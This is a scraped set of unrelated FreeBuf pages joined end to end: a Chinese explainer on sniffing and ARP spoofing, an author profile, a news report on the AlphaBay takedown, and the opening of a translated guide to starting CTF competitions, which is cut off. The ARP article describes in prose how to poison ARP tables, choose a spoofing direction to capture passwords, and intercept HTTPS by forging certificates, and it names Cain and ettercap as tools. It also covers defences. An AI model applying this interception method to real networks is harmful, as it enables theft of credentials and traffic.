3月

合规、技术、实践,从隐私保护走向数据安全
已结束
3月

冠军选手帮你把CTF知识点各个击破
已结束
3月

CTF之web安全入门
已结束

本站由阿里云 提供计算与安全服务

官方QQ群:590717869

用户服务有奖投稿申请专栏提交漏洞参与众测商城企业服务甲方会员厂商会员企业空间企业SRC漏洞众测智能安全合作信息寻求报道广告投放联系我们友情链接关于我们关于我们加入我们
微信公众号
新浪微博赞助商
FreeBuf+小程序
扫码把安全装进口袋

斗象科技FreeBuf漏洞盒子斗象智能安全平台免责条款协议条款Copyright ? 2020 WWW.FREEBUF.COM All Rights Reserved 沪公网安备 31011502009321号
css.php正在加载中…0daybank

arp欺骗

FB招聘站
分类阅读
专栏
公开课
企业服务
用户服务
手机版
搜索
投稿
登录
注册
[科普]嗅探(被动嗅探)与ARP欺骗(主动嗅探)详解mars2013-08-20共630118人围观 ,发现 17 个不明物体系统安全
关于嗅探与ARP欺骗的原理,网络上有很多很好的帖子和文章,但大部分都忽略了数据在网络中的转发过程。实际上用嗅探和ARP欺骗来做标题有点忽悠的成分,因为嗅探本身就包含了主动嗅探和被动嗅探,而ARP欺骗又是一个单独的技术,欺骗的目的只是让数据经过本机,即:主动嗅探=ARP欺骗+抓包。在了解嗅探和ARP欺骗原理之前,我们必须对数据包在各种(交换网络、共享网络等)网络环境中的传输过程,笔者在这边也只针对交换网络和共享网络进行探讨。

若未加说明,文章中的三层指的是网络层,二层指的是数据链路层。

一.数据在网络中的转发过程:

1.数据在交换网络中的传输过程如下图(PC1发包给PC2)

注:此图是以公网网络为基础,如果PC为内网或者加入私有网络则在出口要考虑NAT等情况

a)PC1发现目标IP110.1.1.2(网络号110.1.1.0)与本机不在同网段(掩码为24位,所以本机网络号为1.1.1.0),因此PC1会将数据包丢给网关,为了数据报文能够到达网关,PC1封装的报文里头会以网关的MAC作为目的MAC(网络数据传输,原目的IP不变,原目的MAC通过三层网络时会不断改变)。

b)数据报文到达二层交换机(这里只涉及二层交换,如果是三层交换机并设置了端口IP,则会有所不同)后,由于二层交换机拆解数据报文时只拆解到二层(只拆解到原目的MAC),根本看不懂IP,所以会查找MAC-接口映射表(所谓的建立虚拟链路),发现网关MAC对应的是E5口,则将数据包从E5口丢出去。

c)路由器R1收到数据报文后查看原目的IP(路由器属于三层设备,拆解数据包到IP层),查看数据包的目的IP为110.1.1.1,进而查找路由表,发现数据要到达目的网络,数据包必须往下一跳218.1.1.2发送,因此路由器对数据包进行重封装,查看ARP表,原、目的IP保持不变,将原MAC修改成R1出接口(连接到R2的那个端口)的MAC地址,目的MAC改成R2的进接口(R2接R1的接口MAC地址),接下来和二层传输一样,将数据包丢给R2。

d)R2收到数据包后与R1做的操作一样,直到数据报文到达目标。根据之前的步骤可以推出数据报文到达目标后,原IP、目的IP不变,原MAC为R2接PC2的接口MAC、目的MAC为PC2的MAC。PC2发现数据报文的目的IP和目的MAC与本机相符(非攻击者),从而拆解数据包,获得数据报文内容。回复报文的时候和之前的传输一样。

2.数据在共享网络中的传输图(PC1发包给PC2)

数据报文在共享网络中的传输和交换网络唯一的不同在于第二个步骤,交换网络中交换机会根据MAC-端口对应表进行传输,也就是说除了网关(以图为例),其他同交换机下的PC机无法收到数据报文(没出现攻击的情况下)。而在共享网络中,由于HUB属于一层设备,对于到达本身的数据报文,HUB会对报文进行广播(除了收到报文的那个接口),因此接在同HUB的所有PC都能收到该报文。

注:通常情况下,网卡都是工作在非混杂模式,也就是说即使收到数据报文,网卡会判断目的MAC是否和自己的一样,不一样的话代表数据包不是给自己的,因此会丢弃,只接收那些目的MAC和自己一样的数据报文。在嗅探时必须开启混杂模式,在该模式下,网卡不对数据报文进行判断,一锅端!

二.ARP欺骗:

1.欺骗过程及原理从上面的数据报文传输过程可以知道二层传输是通过MAC进行传输的,在传输过程中PC需要查询ARP表。因此攻击者只要可以改变目标的ARP表就能实现攻击,从而将数据牵引到自己的机器上,如图

a)在正常情况下,PC1通过本地ARP表知道网关1.1.1.2的MAC地址为1.1.1.10260.8c01.1111,所以PC1封装包的时候会将目的MAC设置成路由器的MAC地址。交换机通过MAC-端口对应表能够正常的将数据报文从E1口转发给路由器,实现数据传输。

b)黑客对PC2有完全的控制权,通过不断发送(假冒的)ARP报文告诉PC1,自己才是1.1.1.1对应的MAC是0260.8c01.1113。

c)PC1收到黑客发的ARP报文后,刷新自己的ARP表,将1.1.1.1的MAC误认为是0260.8c01.1113。

d)PC1将要访问外网数据报文的目的MAC设置成0260.8c01.1113(PC2的MAC,目测PC1被自己的ARP表给骗了)。

e)交换机通过拆解包发现目的MAC对应的端口为E4(PC2的那个接口,连锁反应了!),就将数据报文从E4口丢出。

f)PC2成功得到PC1发往外网的请求报文。偷看后重新封包,原IP、目的IP不改变,将原MAC改成PC2的MAC,目的MAC改成网关的(数据包恢复正常,看起来和没攻击时PC1发出的报文完全一样),PC2修改完后将数据包丢给交换机,从而欺骗实现,当然对于该包的回应报文,由于路由器ARP表没被污染,所以能够正常的将返回报文直接丢给PC1。
2.如何选择欺骗方向

在欺骗过程中,选择正确的欺骗方向也是很重要的,通过阅读我们可以看到上面的欺骗方向是PC1à网关。那么我们如何确定正确的欺骗方向呢?

a) 员工工作网络,我们知道正常请求报文里面含有大量的敏感信息,如网站管理后台账户密码等。而请求包的走向是员工PCà网关,如果黑客控制的电脑与员工内部同一网段,那么正常情况下黑客会欺骗员工的PC机自己是网关,从而截获请求报文

b)服务器网络,而在机房(服务器网络)中,管理员一般会在外部进行访问,即请求报文是由网关转发给服务器,也就是说请求报文的走向是网关à服务器,如果黑客控制的是机房里的一台服务器,为了截获到请求报文中的服务器登录密码等敏感信息,攻击者一般会对网关发起欺骗,告诉网关自己是某台或者某些服务器。

c) 实际上不管在员工网络或者机房内部网络,黑客比较习惯与进行双向欺骗,一方面告诉网关自己是某些终端,另一方面告诉同网段的其他终端自己是网关,但是该方法会产生大量的垃圾信息,因为在回应报文中基本上不会携带敏感的信息。

3. ARP欺骗的瓶颈

为了得到更多的敏感信息,很多人会使用双向+批量的欺骗方式,一方面告诉网关自己的MAC对应的IP是网段内所有的IP(这样无论数据报文是给哪台机子的,只要是发送给同网段机器网关都会转发给攻击者);另一方面欺骗所有同网段终端自己是网关(实际上欺骗同网段所有的终端比较容易,直接将ARP包的目的mac设置成FFFFFFFFF就行了),从而所有终端发出的报文都会经过攻击者的机器。但是如果这样子做,攻击者控制的机器直接承载了整个网段的数据流量,要对整个网段的数据进行处理,重封装、再转发,这在服务器的性能和配置上要求可不是一般的苛刻,所以选择好欺骗对象和方向显得非常重要。

三.嗅探和ARP欺骗的区别

a) 嗅探一般存在于共享网络中,在共享网络中一般使用HUB作为接入层,经过HUB的数据报文不管长得什么样,因为HUB工作在第一层,看不懂二层以上的报文是啥样子的,所以一律以广播处理,在同一网段的计算机只要将网卡设置成混杂模式即可。

b) 嗅探在交换网络中不适用,因为交换机是通过MAC-端口对应表来转发数据报文的,所以在交换网络中如果只将网卡设置成混杂模式,而不进行ARP欺骗,其结果只能接受到网络中的广播包。

c) 共享网络中适用ARP欺骗,那是多此一举,适用ARP欺骗的方式会对影响网络流量,对网络造成很大的影响,另外适用ARP欺骗会产生大量的ARP报文,很容易被发现。而嗅探对整个网络几乎没有影响,因为嗅探只是做监听,而不会产生多余的数据报文。

四.加密是否安全

很多人说使用HTTPS或者VPN等手段就可以防止嗅探或者ARP欺骗,这是不全面的。具体要看什么网络及什么技术。下面笔者针对HTTPS和VPN在共享、交换网络中进行探讨。

1. 共享网络+嗅探

a) 在共享网络使用HTTPS确实可以很好的解决数据被窃取的问题(当然个人证书泄露除外),由于监听的机器没有证书也就无法进行解密。

b) 在共享网络中使用VPN技术不一定能够防止,部分VPN技术只是在原有的数据报文多加一个IP报头,对于数据内容本身未做加密,攻击者使用监听技术获取该类数据还是能正常获取报文的内容的

2. 交换网络+ARP嗅探

从原理上讲,该类型的攻击属于中间人攻击,可以伪造任何证书,因此对于HTTPS等来说,攻击者只要偷梁换柱,伪造证书就可以成功获得数据的明文信息。但对于部分使用秘钥不通过公网传输的协议(例如使用publikey验证的SSH,KEY不通过网络传输)就无法截取明文信息,也无法伪造。

3. 共享网络+ARP欺骗

该类型攻击和第2中攻击没啥两样,就不做详细讨论了

五.如何防止ARP欺骗及嗅探。

实际上网上已经有很多种解决方案了,但在这边还是小提一下简单的防止方式。第四点也有提到了一部分。

在交换网络中一般使用双向绑定就可以解决ARP欺骗的问题了,有些牛人说可以直接伪造MAC欺骗交换机,这也是一种绕过方法,但实际上这种方法可行性不高,虽然有时候确实能够截获到数据报文,但会时交换机的MAC-端口对应表产生混乱,另外报文若发给你就不会发给目标服务器,会产生拒绝服务攻击。

在共享网络中使用双向绑定理论上是没效果的,因为只要经过HUB的数据都会进行广播,即使绑定,所有终端也会收到数据报文。Hub不像二层交换,有MAC-端口对应表。

当然对于嗅探和ARP攻击的原理、利用和防御不止文中提到的这些,文章只是笔者的一点心得体会,仅供参考。说这么多,实际上要进行ARP攻击的话,一个cain、一个sniffer、一个ettercap就可以完全搞定了。

via[cngrayhat]

mars
4 篇文章
等级: 3级
||
相关推荐

中间人攻击-ARP毒化

浅谈ARP欺骗的实现与防御

[安全科普]ARP攻击防范方法总结

MITM——ARP篇

ARP欺骗常见姿势及多机ARP欺骗

ARP协议分析&python编程实现ARP欺骗抓图片

以一种轻松的方式来看ARPspoof源码

解读安卓渗透神器DroidSheep看ARP欺骗攻击

这些评论亮了

江bufer回复
@习bufer 手把手的教你撸管你才会懂
)21(亮了

河蟹回复
@network 我才是,我是SB,哦也
)9(亮了
发表评论已有 17 条评论

习bufer 2013-08-20回复1楼
晦涩难懂,

亮了(4)

江bufer 2013-08-20回复
@习bufer 手把手的教你撸管你才会懂

亮了(21)

铁蹄弯刀 2013-08-20回复2楼
还不错

亮了(2)

jacty (1级) 2013-08-20回复3楼
半懂半不懂。。。= =!

亮了(3)

ostrich (1级) 2013-08-20回复4楼
楼主讲得清晰明了,网络工程毕业的吧!

亮了(3)

network 2013-08-20回复
@ostrich 你肯定是网络工程毕业的,竟然能看懂!

亮了(2)

河蟹 2013-08-20回复
@network 我才是,我是SB,哦也

亮了(9)

scantime (1级) 2013-08-20回复5楼
理论很不错现实确很骨感 嗅的时候机器挂掉 等 各种原因很多无法完成

亮了(2)

softbug 认证作者专栏作者(7级)i am here! 2013-08-20回复6楼
这个文章让我想起核攻击lcx作者的arp文章,

亮了(2)

ximing (1级)挑灯夜读,厚积薄发。 2013-08-20回复7楼
谢谢分享了

亮了(2)

jacker (6级)Ubuntu Arch Vim爱好者 2013-08-20回复8楼
这问题有点像有人问我的问题啊,如果实际出现这个要对设备重新设置规划方案。楼主的网络拓扑图很详细符号能看懂啊

亮了(5)

cwg2552298 (6级)Follow my own course 2013-08-20回复9楼
有毅力,打了那么多字!

亮了(2)

Jandy (1级) 2013-08-21回复10楼
真详细

亮了(2)

dennych0u (1级) 2013-08-21回复11楼
LZ讲得太详细啦,很有用!!

话说如果能获取某个3层交换机的权限,嗅探就无处不在了,有没有人给讲讲怎么攻击网络设备

亮了(2)

anlfi (5级) 2013-08-21回复12楼
简单的说就是ARP协议漏洞的利用嘛 现在ARP协议?呵呵

亮了(2)

键盘 (1级)计算机科学与技术 2014-03-17回复13楼
给力的文章!!!!!!

亮了(2)

clear 2014-03-19回复14楼
比学校老师讲的好多了,谢谢又一次科普。

亮了(3)
昵称
请输入昵称
必须您当前尚未登录。登录?注册邮箱
请输入邮箱地址
必须(保密)表情插图
有人回复时邮件通知我

mars

中国灰帽社区站长

4
文章数
2
评论数
0
关注者

关注
最近文章
浅析CDN安全
2013.08.22

[科普]嗅探(被动嗅探)与ARP欺骗(主动嗅探)详解
2013.08.20

黑客可利用云开发平台进行DDOS攻击
2013.05.20

浏览更多
相关阅读
Defcon Quals挑战赛2015 – Twentyfiveseventy关卡WriteUpCloudFlare:香港PopVote史无前例DDoS攻击事件全解析CVE-2017-3085:Adobe Flash泄漏Windows用户凭证SecOps团队在了解安全工具的运作时面临挑战蓝宝菇(APT-C-12):核危机行动揭露
推荐关注

官方公众号

聚焦企业安全

官方QQ群 FreeBuf官方微博
文章目录

活动预告
3月

纯实战化攻防教学 | 玩转黑客操作系统Blackarch
已结束
3月

合规、技术、实践,从隐私保护走向数据安全
已结束
3月

冠军选手帮你把CTF知识点各个击破
已结束
3月

CTF之web安全入门
已结束

本站由阿里云 提供计算与安全服务

官方QQ群:590717869

用户服务有奖投稿申请专栏提交漏洞参与众测商城企业服务甲方会员厂商会员企业空间企业SRC漏洞众测智能安全合作信息寻求报道广告投放联系我们友情链接关于我们关于我们加入我们
微信公众号
新浪微博赞助商
FreeBuf+小程序
扫码把安全装进口袋

斗象科技FreeBuf漏洞盒子斗象智能安全平台免责条款协议条款Copyright ? 2020 WWW.FREEBUF.COM All Rights Reserved 沪公网安备 31011502009321号
css.php正在加载中…0daybank

clouds

FB招聘站
分类阅读
专栏
公开课
企业服务
用户服务
登录
注册
clouds专栏作者TA的专栏注册会员等级:9 级注册日期:2014年10月16日个人描述:I am a robot , don’t talk to me , code to me.
108

关注者

125

金币

他的文章
他的点评
他的关注
关注他的
标题时间操作
挖洞经验 | 劫持Google Data Studio的共享报告链接 WEB安全漏洞2020-03-31
挖洞经验 | 从负载均衡或CDN应用中发现的配置类漏洞 WEB安全漏洞2020-03-29
挖洞经验 | 密码重置Token可预测性导致的账号劫持漏洞 WEB安全漏洞2020-03-22
挖洞经验 | 不被PayPal待见的6个安全漏洞 WEB安全漏洞2020-03-20
深入分析Citrix ADC远程代码执行(RCE)漏洞CVE-2019-19781 WEB安全漏洞2020-03-18
挖洞经验 | 利用Jira的邮件服务器连通测试功能发现其CSRF漏洞 WEB安全漏洞2020-03-14
挖洞经验 | 静态分析APK文件发现APP应用硬编码密码泄露 WEB安全漏洞2020-03-13
挖洞经验 | 利用Acunetix发现Google的一个$5000美金XSS漏洞 WEB安全漏洞2020-03-12
用CVE-2019-19781漏洞黑掉一台Citrix设备 WEB安全漏洞2020-03-09
挖洞经验 | Facebook接口存在的三个信息泄露漏洞 WEB安全漏洞2020-03-03
挖洞经验 | 跨站Websocket Hijacking漏洞导致的Facebook账号劫持 WEB安全漏洞2020-03-02
挖洞经验 | Snapchat不当输入验证漏洞导致的任意构造短信发送 WEB安全漏洞2020-02-27
挖洞经验 | PayPal验证码质询功能(reCAPTCHA Challenge)存在的用户密码泄露漏洞 WEB安全漏洞2020-02-02
挖洞经验 | 用BurpSuite实现越权漏洞(IDOR)的自动发现识别 WEB安全漏洞2020-01-29
挖洞经验 | 谷歌翻译服务(Google Translator)的跨站漏洞 WEB安全漏洞2020-01-27
挖洞经验 | 知名在线教育平台的IDOR漏洞 WEB安全漏洞2020-01-26
1 2 3 … 29 下一页

本站由阿里云 提供计算与安全服务

官方QQ群:590717869

用户服务有奖投稿申请专栏提交漏洞参与众测商城企业服务甲方会员厂商会员企业空间企业SRC漏洞众测智能安全合作信息寻求报道广告投放联系我们友情链接关于我们关于我们加入我们
微信公众号
新浪微博赞助商
FreeBuf+小程序
扫码把安全装进口袋

斗象科技FreeBuf漏洞盒子斗象智能安全平台免责条款协议条款Copyright ? 2020 WWW.FREEBUF.COM All Rights Reserved 沪公网安备 31011502009321号
css.php正在加载中…0daybank

黑市交易网站alphabay

FB招聘站
分类阅读
专栏
公开课
企业服务
用户服务
手机版
搜索
投稿
登录
注册
AlphaBay是怎么垮掉的?解密全球最大黑市AlphaBay被查封全过程Alpha_h4ck2017-07-25金币奖励+6共835443人围观 ,发现 20 个不明物体资讯
又一大暗网市场AlphaBay倒下了,而更加悲剧的是,该网站背后的主谋竟在监狱中自杀了…据说当时警方总共收缴了四辆兰博基尼和三套房产,还真是有钱也没命花啊!

1.png

就在前几天,美国司法部以及荷兰的欧洲刑警组织正式对外宣布,暗网市场AlphaBay和Hansa已被执法部门查封。在此之后,美国司法部门还专门公布了一系列文件,并在这些文件中描述了全球最大的暗网市场是如何被查封的,以及是何原因导致了AlphaBay不得不从地球上消失。

AlphaBay管理员意外泄露了他的个人邮箱地址
根据法庭文件的记录,警方对AlphaBay的调查开始于一年以前。在调查阶段的初期,调查人员曾以卧底身份在AlphaBay市场上购买了商品,并希望通过追踪邮件包裹的运送路径来定位AlphaBay的商品供应商。

但调查人员发现,这些商品包裹都是由那些小喽啰负责运送的,所以这个方法就行不通了。而他们也意识到了,真正的问题在于AlphaBay,这个平台才是关键。幸运的是,当AlphaBay的运营者准备在2014年12月(该市场上线的3个月之后)为市场添加一个论坛功能时,FBI终于找到了突破口。

1-1.jpg

当用户在AlphaBay的论坛上注册之后,会收到一封来自网站管理员的问候邮件。根据FBI在2016年12月搜集到的证据,调查人员在2014年一小段时间内的问候邮件消息头中发现了AlphaBay管理员的个人电子邮箱地址,其邮箱地址为”pimp_alex_91@hotmail.com”。

确定AlphaBay管理员为加拿大国籍
FBI的特工通过上面这个电子邮件地址追踪到了一位名叫Alexandre Cazes的人,此人今年25岁,加拿大人,目前与他的妻子一同生活在泰国。在AlphaBay上,Cazes最早的用户名为“Alpha02”,最后便在2015年将其更改为了“Admin”。随着“Alpha02”的身份被暴露,FBI迅速针对Cazes建立了一个调查小组。根据官方文件的记录,Cazes是一名经验丰富的Web开发者,并且还精通多种计算机技术和编程语言。Cazes在他以前的LinkedIn页面中列举到的技能有并发编程、Web开发、网络管理、服务器管理、网络安全、平面设计、自定义软件开发、密码学、数据库设计和数据库管理等等,而且Cazes还列出了所有他所擅长的编程语言。除此之外,他的LinkedIn页面还标明了他是EBX Technologies的创始人兼CEO,FBI表示Cazes一直都在用这家公司来掩盖AlphaBay的非法所得。

下图为EBX Technologies官网截图:

2.png

FBI还追踪到了Cazes用邮件地址pimp_alex_91@hotmail、contact@ebxtech.com和admin@ebxtech.com所注册的几个PayPal账号。Cazes的Hotmail邮箱地址还绑定了commentcamarche.com的账号,该账号的用户名为Alpha02,与他在AlphaBay上的账号一样。在这个网站中,Cazes发布了一些关于“如何从数字图片中移除病毒”的技术教程。除此之外,邮件地址pimp_alex_91@hotmail.com还注册了很多黑客网站的账号。

根据FBI的调查结果,Cazes貌似在创建AlphaBay之前一直都在从事网络犯罪活动,并且还管理着一个专门出售被盗信用卡数据的论坛,而他在LinkedIn页面上列出的技能以及从事地下信用卡犯罪的经验给他建立AlphaBay提供了很大的帮助。

Cazes处于AlphaBay内部结构的金字塔顶端
在2014年9月至2017年7月之间,AlphaBay从一个无人知晓的小社区迅速成长为了暗网中出售违禁商品的规模最大的市场。FBI表示,Cazes负责选择新的管理员和论坛版主,并支付他们的薪水以及处理纠纷,所以FBI认为Cazes和他的”Alpha02″绝对站在AlphaBay的金字塔顶端。

除了“Alpha02”之外,运营AlphaBay的还有一个名叫DeSnake的“安全管理员”。DeSnake目前仍然下落不明,但FBI表示他掌控的AlphaBay服务器数量与Cazes所管理的数量相同。除此之外,运营网站的还有Raspi、Disc0、Russ0、Botah、BigMuscles和MountainHigh9等账户,这些账户有权限重置用户PIN码或给不满意的买家退款,他们相当于是AlphaBay的客服。

再往下一层就是一个名叫Trappy的“公关经理”了,他相当于是AlphaBay的门面。整个金字塔的最底层是一个名叫ScamWatch团队,该团队由两名成员组成,即Onionhood和Vaas,他们两个人主要负责的是识别伪造的AlphaBay网站、钓鱼网站以及暗网市场诈骗活动。而Cazes就是他们的老板,整个AlphaBay在他的管理和带领之下逐渐成长为了暗网中最大的违禁商品销售市场。

下图为AlphaBay的门户网站(被取缔之前):

3.png

Cazes累积了大约3550万美元的财富
就在美国和加拿大警方于今年7月4日查封了AlphaBay的服务器之后,泰国警方在第二天便成功逮捕了Cazes。就在泰国警方逮捕Cazes的同时,多国警方正在全球范围内收缴Cazes的房产、汽车和钱财。

根据警方透露的信息,Cazes目前拥有价值总和超过2300万美元的加密货币(包括比特币、门罗币、以太币、Zcash币)和银行存款,而他在泰国、列支敦士登、瑞士和圣文森特等国的银行都有账户。除此之外,警方还收缴了价值约为1250万美元的汽车和房产。Cazes在泰国、塞浦路斯、安提瓜和巴布达岛都拥有房产,并且还拥有兰博基尼Aventador和保时捷Panamera等多辆豪车。

Cazes被泰国警方抓了个现形
FBI表示,泰国警方于7月5日突袭了Cazes的住所,他们发现Cazes当时正在使用他的笔记本电脑,这台笔记本电脑既没有锁屏也没有被加密,当时Cazes不仅用“Admin”账号登录了AlphaBay,而且还登录了AlphaBay数据中心提供商的管理员账号。

除此之外,这台笔记本电脑中包存有Cazes所有的财务档案,其中包括物理资产列表、银行账号和加密货币钱包。更加重要的是,这些文档中还记录了每一个加密货币钱包的私钥和密码。

4.png

警方于7月12日发现Cazes死在了牢房里
由此看来,FBI已经成功收集到了Cazes的大量犯罪证据。在泰国警方逮捕Cazes的第二天,加拿大和美国当局就要求将Cazes引渡回国。但泰国警方在7月12日突然发现,Cazes竟然死在了牢房里,当时他的脖子上围有一条毛巾,因此警方初步判断他是自杀而亡,不过具体的死因目前仍在调查之中。

在加拿大媒体的一次采访过程中,Cazes的父亲表示,他的儿子既不吸烟也不吸毒,而且十分聪明,小时候上学还跳过级。除此之外,在被捕之前Cazes在泰国也没有任何的犯罪记录。

总结
不过警方并不会因为Cazes的死亡而放弃调查,因为AlphaBay很可能还有其他的运营人员。你可别忘了,该网站的钱包里目前还有好多好多的钱(比特币),而该网站其他的运营者仍然可以取出这些钱。需要注意的是,目前我们还不清楚Alexandre Cazes在被捕之后跟警方透露了什么消息。

AlphaBay与2014年正式上线,并迅速成为了暗网中最引人注目的新星,它还曾被喻为是“新丝绸之路”(另一个已垮掉的暗网市场),但现在它也跟随着前辈的脚步就这样“去了”。

* 参考来源:bleepingcomputer, FB小编Alpha_h4ck编译,转载请注明来自FreeBuf.COM

更多精彩# AlphaBay# 黑市
Alpha_h4ck
Alpha_h4ck
958 篇文章
等级: 10级
||
相关推荐

AlphaBay:目前全球“人气最旺”的暗网黑市

半壁江山被端!全球暗网市场面临洗牌

SaboTor行动记录:全球警方合作逮捕了数十个在暗网从事违法活动的罪犯,疑似致Dream Market关闭

黑市洗牌:Evolution成为丝绸之路2.0灭亡后最大的黑市交易平台

他破解了第一疑案“门头沟”之谜,历时三年,为追回被盗比特币

丝绸之路(Silk Road)沉浮录:你不知道的那一面(上)

一站式建站平台Deer.io,居然成为了网络犯罪的天堂

暗影追踪:谁是LeakedSource.com的幕后运营者?

这些评论亮了

Root回复
作者名字也是Alpha打头,是其中一个管理员?(哇咔咔,我好像发现了什么了不得的事情)
)34(亮了

delectate(3级)回复
@ 夜尽天明 你先去了解一下什么叫暗网吧。明白了就不会有这个疑问了。
事实证明,社工才是更高级的技术。
)14(亮了

特朗普回复
正常情况下,会被引渡回加拿大,没理由在监狱自杀。。。脖子上有一条毛巾。你们见过用毛巾自己上吊自杀的?或者勒死自己?容我想想。不是谋杀谁信?
)9(亮了
发表评论已有 20 条评论

夜尽天明 (6级)千秋邈矣独留我,百战归来再读书 2017-07-25回复1楼
其实我很好奇,如果xxoo.com这个域名被用于暗网这种的非法交易域名,那么作为域名管理机构,比如(阿里云)这类的服务商不能停止解析这个域名么??为毛不停止解析而任由黑客用于非法网站或者论坛的建设?

亮了(5)

delectate (3级) 2017-07-25回复
@ 夜尽天明 你先去了解一下什么叫暗网吧。明白了就不会有这个疑问了。

事实证明,社工才是更高级的技术。

亮了(14)

Ken_Len 2017-07-26回复
@ delectate 社工應該不算是高級技術吧…..

亮了(5)

manwu91 (4级) 2017-07-25回复2楼

警方这是在炫耀么

亮了(5)

特朗普 2017-07-25回复3楼
正常情况下,会被引渡回加拿大,没理由在监狱自杀。。。脖子上有一条毛巾。你们见过用毛巾自己上吊自杀的?或者勒死自己?容我想想。不是谋杀谁信?

亮了(9)

ynefen (4级) 2017-07-25回复
@ 特朗普 肯定还有更大的幕后黑手,怕Cazes把他供出来所以谋杀了Cazes。嗯,一定是这样

亮了(5)

hackjason8 (1级)www.hackjason.com 2017-07-25回复4楼
?

亮了(1)

Root 2017-07-25回复5楼
作者名字也是Alpha打头,是其中一个管理员?(哇咔咔,我好像发现了什么了不得的事情)

亮了(34)

Alpha_h4ck (10级)好好学习,天天向上 2017-07-25回复
@ Root 你亮了。。。

亮了(3)

jimoyong (5级) 2017-07-26回复
@ Alpha_h4ck 为啥感觉是你亮了[滑稽]

亮了(1)

老铁 2017-07-26回复
@ Root 这么说的话,alphabet也是其中一个分公司了xD

亮了(1)

freebug_n (4级)Nigger! 2017-07-25回复6楼
我说怎么断货了呢!

亮了(3)

上帝De骰子 2017-07-25回复7楼
难道四辆兰博基尼三套房产不是花的钱吗

亮了(0)

说真话不说真理 2017-07-25回复8楼
没听过。

亮了(0)

ynefen (4级) 2017-07-25回复9楼
我今天上午正想上AlphaBay看看,然后就发现被FBI给封了。然后晚上就在freebuf上看到这篇文章。。。这时间顺序好巧啊

亮了(2)

Ken_Len 2017-07-26回复
@ ynefen 要安靜..

亮了(0)

李自知s 2017-07-26回复10楼
醉生梦死的人生

亮了(0)

CSUW 2017-07-26回复11楼
第一眼看成AliPay是怎么垮掉的

亮了(3)

5895abce57413d7e70d6bd99 2017-07-26回复12楼
Alphago也是其中一员吧

亮了(0)

leveluo (3级) 2017-07-26回复13楼
社工还是屌

亮了(1)
昵称
请输入昵称
必须您当前尚未登录。登录?注册邮箱
请输入邮箱地址
必须(保密)表情插图
有人回复时邮件通知我
Alpha_h4ck
Alpha_h4ck

好好学习,天天向上

958
文章数
5
评论数
68
关注者

关注
最近文章
Projectsandcastle:一款针对iPhone的AndroidLinux支持工具
2020.03.31

Multi-Juicer:针对OWASP Juice Shop的多用户CTF及安全培训平台
2020.03.30

看我如何通过XSS窃取localStorage中的JWT
2020.03.30

浏览更多
文章目录

AlphaBay管理员意外泄露了他的个人邮箱地址
确定AlphaBay管理员为加拿大国籍
Cazes处于AlphaBay内部结构的金字塔顶端
Cazes累积了大约3550万美元的财富
Cazes被泰国警方抓了个现形
警方于7月12日发现Cazes死在了牢房里
总结
相关阅读
AlphaBay是怎么垮掉的?解密全球最大黑市AlphaBay被查封全过程BUF早餐铺 | 国际版小米9号平衡车曝严重漏洞;微软将Fancy Bear黑客组织告上法庭;Tor发布漏洞奖励计划地下黑市xDedic出售70000台被黑服务器,最便宜的只要6美刀解密:地下黑市都在卖什么?攻破黑市之拿下吃鸡DNF等游戏钓鱼站群
推荐关注

官方公众号

聚焦企业安全

官方QQ群 FreeBuf官方微博
文章目录

AlphaBay管理员意外泄露了他的个人邮箱地址
确定AlphaBay管理员为加拿大国籍
Cazes处于AlphaBay内部结构的金字塔顶端
Cazes累积了大约3550万美元的财富
Cazes被泰国警方抓了个现形
警方于7月12日发现Cazes死在了牢房里
总结
活动预告
3月

纯实战化攻防教学 | 玩转黑客操作系统Blackarch
已结束
3月

合规、技术、实践,从隐私保护走向数据安全
已结束
3月

冠军选手帮你把CTF知识点各个击破
已结束
3月

CTF之web安全入门
已结束

本站由阿里云 提供计算与安全服务

官方QQ群:590717869

用户服务有奖投稿申请专栏提交漏洞参与众测商城企业服务甲方会员厂商会员企业空间企业SRC漏洞众测智能安全合作信息寻求报道广告投放联系我们友情链接关于我们关于我们加入我们
微信公众号
新浪微博赞助商
FreeBuf+小程序
扫码把安全装进口袋

斗象科技FreeBuf漏洞盒子斗象智能安全平台免责条款协议条款Copyright ? 2020 WWW.FREEBUF.COM All Rights Reserved 沪公网安备 31011502009321号
css.php正在加载中…0daybank

ctf比赛

FB招聘站
分类阅读
专栏
公开课
企业服务
用户服务
手机版
搜索
投稿
登录
注册
如何开始你的CTF比赛之旅IDF_Lab认证作者2014-06-20金币奖励+5共2456320人围观 ,发现 37 个不明物体其他
原文:http://www.endgame.com/blog/how-to-get-started-in-ctf.html

翻译:赵阳

在过去的两个星期里,我已经在DEFCON 22 CTF里检测出了两个不同的问题:“shitsco”和“nonameyet”。感谢所有的意见和评论,我遇到的最常见的问题是:“我怎么才能在CTFs里开始?”在不久前我问过自己一样的问题,所以我想要给出些对你追求CTFs的建议和资源。最简单的方法就是注册一个介绍CTF的帐号,如CSAW, Pico CTF, Microcorruption或是其他的。通过实践、耐心和奉献精神,你的技能会随着时间而提高。

如果你对CTF竞争环境之外的问题有兴趣,这里有一些CTF比赛问题的集锦。挑战往往也是有多种不同的难度级别,注意解决最简单的问题。难易程度是根据你的个人技能的程度决定的,如果你的长处是取证,但是你对加密不在行,取证问题将会成为得分点而相比之下加密问题就会拖后腿。CTF组织者对此有同样的感知,这是为什么对于CTF比赛的评价是很大的挑战性。

如果你已经亲自尝试过几个基础问题且仍然苦恼,现在有很多自学的机会!CTF比赛主要表现以下几个技能上:逆向工程、密码学、ACM编程、web漏洞、二进制练习、网络和取证。可以从中选择并关注一个你已经上手的技能方向。

1、逆向工程。我强烈建议你得到一个IDA Pro的副本,这有免费版和学生认证书。尝试下crack me的问题。写出你的C语言代码,然后进行反编译。重复这个过程,同时更改编译器的选项和程序逻辑。在编译的二进制文件中“if”声明和“select”语句有什么不同?我建议你专注于一个单一的原始架构:x86、x86_64或是ARM。在处理器手册中查找你要找的,参考有:

《Practical Reverse Engineering》

《Reversing: Secrets of Reverse Engineering》

《The IDA Pro Book》

2、加密。虽然这不是我自己的强项,但这里有一些参考还是要看看的:

《Applied Cryptography》

《Practical Cryptography》

Cryptography I

3、ACM编程。选择一个高层次的语言,我推荐使用Python或Ruby。对于Python而言,阅读下《Dive into Python》和找一些你要加入的项目。值得一提的是Metasploit是用Ruby编写的。关于算法和数据结构的计算机科学课也要在此类中要走很长的路。看看来自CTF和其他编程的挑战,战胜他们。专注于创建一个解决方法而不是最快或是最好的方法,特别是在你刚刚开始的时候。

